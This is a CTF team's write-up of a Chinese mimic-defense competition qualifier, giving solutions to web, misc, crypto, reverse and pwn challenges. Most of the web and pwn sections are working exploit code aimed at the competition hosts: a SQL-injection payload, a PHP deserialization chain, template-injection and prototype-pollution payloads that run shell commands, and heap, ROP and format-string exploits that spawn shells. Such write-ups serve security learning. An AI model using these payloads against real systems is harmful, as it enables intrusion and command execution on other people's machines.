第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

admin 2022年11月8日13:15:37CTF专场评论34 views21797字阅读72分39秒阅读模式

    EDI

JOIN US ▶▶▶

招新


EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。

欢迎各位师傅加入EDI,大家一起打CTF,一起进步。

诚招re crypto pwn misc方向的师傅)有意向的师傅请联系邮箱[email protected]edisec.net、[email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。

点击蓝字 ·  关注我们

01

Web

1

popsql

benchmark盲注 

sys.schema_table_statistics sys.x$statement_analysis Fl49ish3re.f1aG123
'password' : f"a'or/**/if((select/**/strcmp(ord(right((select(group_concat(f1aG123))from(Fl49ish3re)),{i})),{s})),1,benchmark(7000000,sha(1)))/**/or'a"

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

2

ezus

/index.php/tm.php//%a1?source= 
获取到源码 
打⼀下 getflag
<?phpclass UserAccount{    protected $username;    protected $password;
public function __construct($username, $password){ $this->username = $username; $this->password = $password; // $this->password = new order("suanve://[email protected]/../../../../../../../Users/su/Downloads/fastify/flag","file://try/pass//php:"); }}
function object_sleep($str){ $ob = str_replace(chr(0) . '*' . chr(0), '@[email protected]@[email protected]', $str); return $ob;}
function object_weakup($ob){ $r = str_replace('@[email protected]@[email protected]', chr(0) . '*' . chr(0), $ob); return $r;}
class order{ public $f; public $hint;
public function __construct($hint, $f){ $this->f = $f; $this->hint = $hint; }
public function __wakeup(){ //something in hint.php // if ($this->hint != "pass" || $this->f != "pass") { // $this->hint = "pass"; // $this->f = "pass"; // } }
public function __destruct(){ if (filter_var($this->hint, FILTER_VALIDATE_URL)) { $r = parse_url($this->hint); if (!empty($this->f)) { if (strpos($this->f, "try") !== false && strpos($this->f, "pass") !== false) { @include($this->f . '.php'); } else { die("try again!"); } if (preg_match('/prankhub$/', $r['host'])) { @$out = file_get_contents($this->hint); echo "<br/>" . $out; } else { die("<br/>error"); } } else { die("try it!"); } } else { echo "Invalid URL"; } }}
// @$username = $_POST['username'];// @$password = $_POST['password'];
$username = "@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]";$password = '";s:11:"%00*%00password";O:5:"order":2:{s:1:"f";s:21:"file://try/pass//php:";s:4:"hint";s:80:"suanve://[email protected]/../../../../../../../Users/su/Downloads/fastify/flag";}';$password = urldecode($password);// unserialize($password);$a = new UserAccount($username, $password);$user = serialize($a);echo $user;echo "pop:".object_weakup(object_sleep($user));unserialize(object_weakup(object_sleep($user)));
POST /tm.php HTTP/1.1Host: 172.51.243.32User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 232  [email protected]@[email protected]@@0@[email protected]@@0@[email protected]@@0@[email protected]@@0@[email protected]@@0@[email protected]@@0@[email protected]@&password=";s:11:"%00*%00password";O:5:"order":3:{s:1:"f";s:21:"file://try/pass//php:";s:4:"hint";s:67:"suanve://[email protected]/../../../../../../../f1111444449999.txt";}

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

3

没有⼈⽐我更懂py

经典⼋进制绕过 
[''class']['mro'][1]'subclasses'[213]['init']['globals']['builtins']['eval']('import("o"+"s").popen("cat /*").read()'']
data={{()['137137143154141163163137137']['137137155162157137137'][1]['137137163165142143154141163163145163137137']()[213]['137137151156151164137137']['137137147154157142141154163137137']['137137142165151154164151156163137137']['145166141154']('137137151155160157162164137137504215742534216342515616015716014515650421431411644057524251561621451411445051')}}

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

4

WHOYOUARE

污染参数 执⾏任意命令
POST /user HTTP/1.1Host: 172.51.243.13:3000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/jsonContent-Length: 121{"user":["{"constructor":{"prototype":{"2":"cat /flag"}},"username":"admin","command":["-c","-i"]}"]}

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

02

Misc

1

Welcome

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

2

babymisc

猜数字

from pwn import *# context.log_level = 'debug'while True:    io = remote("172.51.243.74",9999)    io.recvline()    io.recvline()    io.recvline()    io.sendline("Y")    #    low = 0    up = 999999    # guess = 454346    for i in range(15):        guess = round((int(up)+int(low))/2)        s = ""        try:            s = io.recvuntil(b"Please enter a number:")        except:            io.interactive()        print(b"[+]"+s)        if b"Please e" not in s:            print(s)            break
# s = io.recvuntil(b"Please enter a number:") print(f"[*] GET {s}") if "low" in str(s): low = guess guess = int ((up - low) / 2) + low # print(low) elif "up" in str(s): up = guess guess = int ((up - low) / 2) + low # print(up) else: guess = int ((up - low) / 2) + low guess = int(guess) print(f"[*] SEND {guess}") io.sendline(f"{guess}") if "lost" in str(s): break elif "flag" in str(s): print("flag!!!!!") break

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

03

Crypto

1

weakrandom

sha256硬爆,过第⼀个验证。然后多跑脚本,发现在⼀些次数下存在定值670760960,⽤该定值去碰撞即可。

from pwn import *import hashlibimport oscontext.log_level = 'debug'p = remote('172.51.243.182', 9998)class WeakRandom:    def __init__(self,seed,n,s):        self.x = seed        self.n = n        self.s = s    def next(self):        x = int((self.x ** 2) // (10 ** (self.s // 2))) % self.n        self.x = x        high = (int(hashlib.sha256(str(x).encode()).hexdigest(),16) >> 16) & (2 ** 16 - 1)        low = x & (2 ** 16 - 1)        result = high << 16 | low        return resultString = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz"p.recvuntil(b'sha256(XXXX+')a = p.recvuntil(b') == ')[:-5]b = p.recvline().strip().decode()for i in String:    for j in String:        for k in String:            for l in String:                s = (i+j+k+l).encode() + a                sha = hashlib.sha256(s).hexdigest()                if sha == b:                    p.recvuntil(b'Give me XXXX:n')                    p.sendline(s[:4])n = 10000000000s = 4seed = os.urandom(4)seed = int.from_bytes(seed,byteorder = "big")r = WeakRandom(seed,n,s)while True:    p.recvuntil(b'Please your guess : ')    #p.sendline(str(r.next()).encode('ascii'))    p.sendline(b'670760960')#p.interactive()

04

Re

1

windows_call

AES查表法 + 函数Hook 解题思路 开头两个md5是为了检验输⼊的数据为⼤写字⺟。

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

之后程序把flag{}中的内容分为了两部分

第一部分只有前8字节

第二部分为剩下的字节

程序把第二部分转换成了16进制数据,并对第一部分进行了一些加密操作

,最终在进入AES加密之前两部分进行了异或

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

sub_402706函数就是AES加密的主要逻辑函数,看到参数a1被分成了四个部分,且每⼀部分都有256字节数据,猜 测是AES查表法加密 ⾄此,函数主要逻辑全部清楚 解密脚本思路: 先求第⼀部分数据:
from z3 import *x = BitVec("x",16)y = BitVec("y",16)sol = Solver()



def xpan(n): if n < 0: return n+0x100 else: return n
md5_init = x ^ yv25 = (x ^ y) & 0xff MD5Final = md5_init >> 8
v38 = [0] * 16for v23 in range(16): v38[v23] = ((MD5Final + v23) & 0xff) ^ ((v25 + v23) & 0xff)
MD5Update = 0for v27 in range(16): v29 = v38[v27] ^ xpan(v27 - 64); MD5Update = (MD5Update + v29) & 0xffff

sol.add((x & 0xff00) >= 0xc800)sol.add((x & 0xff00) <= 0xd000)sol.add((y & 0xff00) >= 0xc500)sol.add((y & 0xff00) <= 0xd000)
sol.add((y - x) & 0xffff == 0x2B8)sol.add(y & 0xff == 0xA0)sol.add((x & 0xFF00) < 0xCA00)
sol.add(MD5Update == 0x8A8) # 0xc9e8 0xcca0assert sol.check() == sat
print(hex(sol.model()[x].as_long()),end = " ")print(hex(sol.model()[y].as_long()))

得到数据: 0xc9e8 0xcca0 

下⾯进⾏AES解密与异或

qqq = [0x4D, 0x4F, 0x4D, 0x43, 0x45, 0x47, 0x45, 0x43, 0x5D, 0x5F, 0x5D, 0x43, 0x45, 0x47, 0x45, 0x43]# ppp = [0xC6, 0xD7, 0x19, 0x8E, 0x95, 0xEB, 0x77, 0x58, 0x24, 0x50, 0x9A, 0x0D, 0xBF, 0x15, 0x4A, 0xFF]

from Crypto.Cipher import AESfrom struct import *cip_list = [0x84,0x37,0xa0,0xf3,0xec,0x36,0x34,0xfc,0x94,0xa2,0x38,0x6f,0x3f,0x34,0x7e,0x7c]

cip = b""for i in cip_list: cip += pack("B", i)
key = b""key_list = [0x8D, 0x8E, 0x8F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x95, 0x96, 0x97, 0x88, 0x89, 0x8A, 0x8B, 0x8C]for i in key_list: key += pack("B", i)
print("cip => ", cip)print("key => ",key)

Set_AES = AES.new(key,AES.MODE_ECB)# m = Set_AES.encrypt(cip)m = Set_AES.decrypt(cip)# print(m)ans = 0for i in m: print(((hex(i ^ qqq[ans])[2:]).rjust(2,"0")).upper(),end="") ans += 1print()
qqq = [0x4D, 0x4F, 0x4D, 0x43, 0x45, 0x47, 0x45, 0x43, 0x5D, 0x5F, 0x5D, 0x43, 0x45, 0x47, 0x45, 0x43]# ppp = [0xC6, 0xD7, 0x19, 0x8E, 0x95, 0xEB, 0x77, 0x58, 0x24, 0x50, 0x9A, 0x0D, 0xBF, 0x15, 0x4A, 0xFF]

from Crypto.Cipher import AESfrom struct import *cip_list = [0x84,0x37,0xa0,0xf3,0xec,0x36,0x34,0xfc,0x94,0xa2,0x38,0x6f,0x3f,0x34,0x7e,0x7c]

cip = b""for i in cip_list: cip += pack("B", i)
key = b""key_list = [0x8D, 0x8E, 0x8F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x95, 0x96, 0x97, 0x88, 0x89, 0x8A, 0x8B, 0x8C]for i in key_list: key += pack("B", i)
print("cip => ", cip)print("key => ",key)

Set_AES = AES.new(key,AES.MODE_ECB)# m = Set_AES.encrypt(cip)m = Set_AES.decrypt(cip)# print(m)ans = 0print("flag{E8C9A0CC",end = "")for i in m: print(((hex(i ^ qqq[ans])[2:]).rjust(2,"0")).upper(),end="") ans += 1print("}")
flag即为: flag{E8C9A0CC8B9854CDD0AC321B790FC74EFA520FBC}

2

comeongo

Go语⾔逆向,base58编码

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

这⾥是第⼀个check,经过调试发现是base58编码,其解密后的结果就name的前8位和passwd的前8位。

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

第⼆个check,通过main_io_read 函数进⾏了字⺟的移位操作,移动⼤⼩为12 (注意并不是凯撒加密) 之后进⾏了base64编码。

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

解码并移位后可以得到 Name[8] ~ Name[11] 、passwd[8]~passwd[11]的值 第三个check。

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

这两个函数对最后的字符进⾏了约束,经过调试可以找到最后的Name和passwd分别为:

name = "[email protected]"passwd = "G3tItEzForRevG0!"
转md5:
name = "[email protected]"passwd = "G3tItEzForRevG0!"
import hashlib
str = "flag{" + name + passwd + "}"hl = hashlib.md5()
hl.update(str.encode(encoding='utf-8'))ttt = hl.hexdigest()print(str)print(ttt)

flag即为:

6470d669e15349795c646c9549ab2f98

05

Pwn

1

bfbf

存在数组越界,可以读取栈内地址,以及修改返回地址进⾏ROP。

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

不知道为什么这题没办法getshell,⼜因为存在沙箱,不允许fd>1,考虑close(0),然后⽤fd=0读取flag即可。
#!usr/bin/env python #coding=utf-8from pwn import *context(arch = 'amd64',os = 'linux',log_level = 'debug')elf = ELF('pwn')libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')DEBUG = 0if DEBUG:    #libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")    #ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/ld-2.27.so")    #p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})    p = process('./pwn')else:    ip = '172.51.243.161'    port = 9999    libc = ELF("./libc.so.6")    p = remote(ip, port)    def debug(info="b main"):  #gdb.attach(p, info)  #gdb.attach(p, "b *$rebase(0x17e3)")    gdb.attach(p, "b *$rebase(0x18cd)")

p.recvuntil(b'BF_PARSER>>n')payload = b'>'*0x238 + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.'payload += b'<'*0x25 + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.'payload += b'<'*5 + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>'for i in range(28): payload += b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>'#debug()p.send(payload)sleep(0.5)leak = u64(p.recv(6).ljust(8, b'x00')) - 0x24083log.info("libc_base==>0x%x" %leak) pie = u64(p.recv(6).ljust(8, b'x00')) - 0x1955log.info("pie==>0x%x" %pie)pop_rdi = 0x0000000000023b6a + leakpop_rsi = 0x000000000002601f + leakpop_rdx = 0x0000000000142c92 + leakret = 0x0000000000022679 + leakread = leak + libc.sym['read']bss = 0x0000000000008060 + pieopen = libc.sym['open'] + leakclose = leak + libc.sym['close']write = leak + libc.sym['write']
payload2 = p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(8) + p64(read)payload2 += p64(pop_rdi) + p64(0) + p64(close)payload2 += p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(open)payload2 += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(50) + p64(read)payload2 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(50) + p64(write)p.send(payload2)sleep(0.5)p.send(b'./flagx00x00')p.interactive()

2

webheap_revenge

#coding:utf-8from pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./webheap_revenge'elf=ELF(elfelf)context.arch=elf.archgdb_text='''  b * $rebase(0x3DE8)  b * $rebase(0x3CE0)  '''
if len(sys.argv)==1 : io=process(elfelf) gdb_open=1 libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
elif sys.argv[1]=='2' : io=process(elfelf) gdb_open=0 libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else : io=remote('172.51.243.88',9999) gdb_open=0 libc=ELF('./libc-2.27.so') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a): if gdb_open==1 : gdb.attach(io,a)
def build_data(a1, a2, a3,data2): data = "xb9x80x05" data += "x86" + p32(a1) data += "x82" + p32(a2) data += "x82" + p32(a3) data += "xbdx83" + p64(len(data2))+data2 data += 'x80x05' io.sendlineafter("Packet length: ",str(len(data))) io.sendafter('Content: ',data)
def add(a,b): build_data(0,a,b,'aaaa')
def show(a): build_data(1,a,0,'aaaa')
def delete(a): build_data(2,a,0,'aaaa')
def edit(a,b): build_data(3,a,0,b)

add(0,0x4f0)add(1,0x100)add(2,0x100)add(3,0x100)
delete(0)add(0,0x4f0)show(0)
libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-96-0x10libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']delete(3)delete(2)edit(1,'a'*0x108+p64(0x111)+p64(free_hook_addr))add(2,0x100)add(3,0x100)edit(2,'/bin/shx00')edit(3,p64(system_addr))delete(2)

success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))
gdb_attach(io,gdb_text)io.interactive()

3

webheap

#coding:utf-8from pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./webheap'elf=ELF(elfelf)context.arch=elf.archgdb_text='''  b * $rebase(0x3DE8)  b * $rebase(0x3CE0)  '''
if len(sys.argv)==1 : io=process(elfelf) gdb_open=1 libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
elif sys.argv[1]=='2' : io=process(elfelf) gdb_open=0 libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else : io=remote('172.51.243.210',9999) gdb_open=0 libc=ELF('./libc-2.27.so') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a): if gdb_open==1 : gdb.attach(io,a)
def build_data(a1, a2, a3,data2=b""): data = "xb9x80x05" data += "x86" + p32(a1) data += "x82" + p32(a2) data += "x82" + p32(a3) data += "xbdx83" + p64(len(data2))+data2 data += 'x80x05' io.sendlineafter("Packet length: ",str(len(data))) io.sendafter('Content: ',data)
def add(a,b): build_data(0,a,b,'aaaa')
def show(a): build_data(1,a,0,'aaaa')
def delete(a): build_data(2,a,0,'aaaa')
def edit(a,b): build_data(3,a,0,b)

add(0,0x500)add(1,0x100)delete(0)show(0)libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-96-0x10libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']
delete(1)edit(1,'x00'*0x10)delete(1)edit(1,p64(free_hook_addr))add(2,0x100)add(3,0x100)edit(2,'/bin/shx00')edit(3,p64(system_addr))delete(2)
success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))
gdb_attach(io,gdb_text)io.interactive()

4

store

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./store'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch
gdb_text=''' telescope $rebase(0x202040) 16 b mprotect '''
if len(sys.argv)==1 : clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6') io=process(elfelf) gdb_open=1 # io=process(['./'],env={'LD_PRELOAD':'./'}) clibc.srand(clibc.time(0)) libc=ELF('./libc-2.31.so') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else : clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6') io=remote('172.51.243.98',9999) gdb_open=0 clibc.srand(clibc.time(0)) libc=ELF('./libc-2.31.so') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a): if gdb_open==1 : gdb.attach(io,a)
def choice(a): io.sendlineafter('choice: ',str(a))
def add(a,b,c): choice(1) io.sendlineafter('Size: ',str(a)) io.sendafter('Content: n',b) io.sendafter('Remark: n',c)
def add_no(a): choice(1) io.sendlineafter('Size: ',str(a)) def edit(a,b,c): choice(3) io.sendlineafter('Index: ',str(a)) io.sendafter('Content: n',b) io.sendafter('Remark: n',c)
def show(a): choice(4) io.sendlineafter('Index: ',str(a))
def delete(a): choice(2) io.sendlineafter('Index: ',str(a))

add(0x720,'aaaa','aaaa') add(0x710,'aaaa','aaaa')
delete(0) delete(1) show(0)
libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-96-0x10 libc.address=libc_base bin_sh_addr=libc.search('/bin/shx00').next() system_addr=libc.sym['system'] free_hook_addr=libc.sym['__free_hook'] mprotect_addr = libc.sym['mprotect'] _IO_list_all = libc.sym['_IO_list_all']
show(1) io.recvuntil('Content: n') heap_base=u64(io.recv(6)+'x00x00')
magic = libc_base + 0x0000000000157d8a ''' mov rbp,QWORD PTR [rdi+0x48] mov rax,QWORD PTR [rbp+0x18] lea r13,[rbp+0x10] mov DWORD PTR [rbp+0x10],0x0 mov rdi,r13 call QWORD PTR [rax+0x28] '''
_IO_str_jumps = libc.sym['_IO_file_jumps']+0xc0 _IO_cookie_jumps = libc.sym['_IO_file_jumps']-0xa80 fs_base = libc_base +0x1f35c0 leave_ret = libc_base + 0x000000000005aa48 add30_rsp_pop_rbx = libc_base + 0x000000000011177d pop_rdi = libc_base + 0x0000000000026b72 pop_rsi = libc_base + 0x0000000000027529 pop_rdx_rbx = libc_base + 0x0000000000162866 main_arena = libc_base + 0x1f2cc0 - 0x60
heap_base=heap_base-0x290

IO_address=heap_base+0x290 IO_FILE = 'x00'*8 IO_FILE += p64(heap_base + 0x10) # buf_base IO_FILE += p64(heap_base + 0x10 + 0x700) # buf_end IO_FILE += p64(0) IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x08 + p64(IO_address + 0xE0) #chain IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x40 IO_FILE += 'x00'*8 + p64(_IO_str_jumps)
IO_FILE += 'x00'*0x20 + p64(0) + p64(0xFFFFFFFF) + 'x00'*8 IO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x10) # buf_base IO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x10 + 270) # buf_end IO_FILE += p64(0) IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x08 + p64(IO_address + 0xE0*2) #chain IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x40 IO_FILE += 'x00'*8 + p64(_IO_str_jumps)

IO_FILE += 'x00'*0x20 + p64(0) + p64(0xFFFFFFFF) + 'x00'*8 IO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x90 + 0x40 + 0x10) # buf_base IO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x90 + 0x40 + 0x10 + 14) # buf_end IO_FILE += p64(0) IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x08 + p64(IO_address + 0xE0*3) #chain IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x40 IO_FILE += 'x00'*8 + p64(_IO_str_jumps)
IO_FILE += 'x00'*0x20 + p64(0) + p64(0xFFFFFFFF) + 'x00'*8 IO_FILE += p64(0) # buf_base IO_FILE += p64(0) # buf_end IO_FILE += p64(0) IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x08 + p64(0) #chain IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x10 IO_FILE += 'x00'*0x40 IO_FILE += 'x00'*8 + p64(_IO_cookie_jumps + 0x60)
pay1=IO_FILE
rol = lambda val, r_bits, max_bits: (val << r_bits%max_bits) & (2**max_bits-1) | ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits))) R = rol((magic), 0x11, 64)
orw_address = IO_address + 0xE0*4 + 0x20 + 0x90 + 0x40 + 0x10 + 0x20 + 0x10
IO_FILE += p64(orw_address) + p64(0) + p64(R) + p64(0) IO_FILE += p64(0) + p64(0x21) IO_FILE += 'x03x00'*0x10 + 'x00x00'*0x30 IO_FILE += 'x00'*0x8*0x7 IO_FILE += p64(fs_base+0x30) IO_FILE += (p64(0) + p64(0x21))*4
IO_FILE += 'x00'*0x28 + p64(leave_ret) +'x00'*0x18 + p64(orw_address + 0x50) + 'x00'*0x8 + p64(add30_rsp_pop_rbx) + p64(0) + p64(orw_address) + p64(0) IO_FILE += 'x00'*0x20 + p64(libc_base+0x0000000000032b5a)+p64(IO_address+0x740) pay = p64(pop_rdi) + p64(heap_base) + p64(pop_rsi) + p64(0xF000) + p64(pop_rdx_rbx) + p64(7) + p64(0) pay += p64(mprotect_addr) + p64(orw_address + 0xE0+0x1b0+0x48) pay += asm(''' mov rax, 0xc0 mov rbx, 0x500000 mov rcx, 0x5000 mov rdx, 3 mov rsi, 1048610 xor rdi, rdi xor rbp, rbp int 0x80
mov rsp, 0x500a00
mov rax, 5 push 0x2e mov rbx, rsp xor rcx, rcx int 0x80
mov rbx, rax mov rax, 0x8d mov rcx, rsp mov rdx, 0x1337 int 0x80
add rcx, 126
mov rdi, rax mov rsi, rsp mov rdx, 0x100 xor rax, rax syscall
mov rdi, 1 mov rax, 1 syscall
mov rdi, 0 mov rsi, 0x500c00 mov rdx, 0x100 xor rax, rax syscall
mov rax, 5 mov rbx, 0x500c00 xor rcx, rcx xor rdx, rdx int 0x80
mov rdi, rax mov rsi, rsp mov rdx, 0x100 xor rax, rax syscall
mov rdi, 1 mov rax, 1 syscall ''')
payload = p64(0)*3 payload += p64(_IO_list_all - 0x20) payload += IO_FILE

add_no(0x720) add_no(0x710) delete(0) add_no(0xff0) edit(0,payload,pay.ljust(0x100)) delete(1) add_no(0xff0) add_no(0x710)
choice(5) io.recvuntil('f1ag') flag_name=flag+io.recvuntil('x00') io.send(flag_name)

success('libc_base:'+hex(libc_base)) success('heap_base:'+hex(heap_base))
gdb_attach(io,gdb_text) io.interactive()
# except Exception as e: # io.close() # continue # else: # continue f1agdeb355a8b42ef5a9ea4ez8

06

MIMIC

1

pwn1

借⽤格式化字符泄露出canary,然后rop

#!usr/bin/env python #coding=utf-8from pwn import *p = remote("172.51.243.90", 9999)#p = process('./pwn1')context.log_level = 'debug'elf = ELF('./pwn1')#gdb.attach(p, "b main")
p.recvuntil(b'somethingn')p.sendline(b'1')p.recvuntil(b'0x')pie = int(p.recv(12), 16) - 0xa94log.info("pie==>" + hex(pie))binsh = 0x0000000000202068 + piesystem = 0xa2c + piepop_rdi = 0xc73 + pie
p.sendline(b'2')p.send(b"%33$p")p.recvuntil(b'0x')canary = int(p.recv(16), 16)log.info("canary==>" + hex(canary))payload = b'a'*0xc8 + p64(canary) + p64(0xdeadbeef) + p64(pop_rdi) + p64(binsh) + p64(system)p.send(payload)p.interactive()

2

pwn1-1

跟pwn1没什么差别,漏洞点是⼀致的,但是这边getshell需要调整rdx为0

#!usr/bin/env python #coding=utf-8from pwn import *p = remote("172.51.243.208", 9999)#p = process('./pwn1-1')context.log_level = 'debug'#gdb.attach(p, "b *$rebase(0x00000000000014F4)")
p.recvuntil(b'Welcome to mimic world,try somethingn')p.sendline(b'1')p.recvuntil(b'0x')pie = int(p.recv(12), 16) - 0x12a0log.info("pie==>" + hex(pie))binsh = 0x0000000000004050 + piesystem = 0x00000000000011A2 + piepop_rdi = 0x0000000000001943 + piepp_ret = 0x0000000000001941 + piebss = 0x0000000000004060 + pieret = 0x000000000000101a + piex_bss = 0x000000000000406C + pie
p.sendline(b'2')p.recvuntil(b"hellon")payload = b'a' + b'%9$hnna' + p64(x_bss)p.send(payload)sleep(2)payload2 = b'x00'*0xe8 + p64(bss) + p64(0) + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(pp_ret) + p64(0)*2 + p64(system)p.send(payload2)# p.send(payload2)p.interactive()

3

pwn2-1

原题,把hacknote改成64位了,但是思路一致

#!usr/bin/env python #coding=utf-8from pwn import *context(arch = 'amd64',os = 'linux',log_level = 'debug')elf = ELF('pwn2-1')libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')DEBUG = 0if DEBUG:    #libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")    #ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/ld-2.27.so")    #p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})    p = process('./pwn2-1')else:    ip = '172.51.243.104'    port = 9999    #libc = ELF("./libc.so.6")    p = remote(ip, port)    def debug(info="b main"):  #gdb.attach(p, info)  gdb.attach(p, "b *$rebase(0x0000000000001B0A)")

def add(size,content): p.sendlineafter('choice :', b'1') p.sendlineafter('Note size :',str(size).encode("ascii")) p.sendafter('Content :',content)

def free(idx): p.sendlineafter('choice :', b'2') p.sendlineafter('Index :',str(idx).encode("ascii"))

def show(idx): p.sendlineafter('choice :', b'3') p.sendlineafter('Index :',str(idx).encode("ascii"))
#debug()p.sendlineafter(b"Your choice :", b'5')p.recvuntil(b'0x')pie = int(p.recv(12), 16) - 0x11f0puts = pie + 0x11d0log.info("pie==>0x%x" %pie)sys = 0x0000000000001BF2 + pieadd(0x20, b'a')add(0x20, b'a')free(0)free(1)add(0x10, p64(puts) + p64(elf.got['puts'] + pie))show(0)leak = u64(p.recv(6).ljust(8, b'x00')) - libc.sym['puts']log.info("libc==>0x%x" %leak)ogg = leak + 0xe3b01free(2)add(0x10, p64(ogg))show(0)
p.interactive()

4

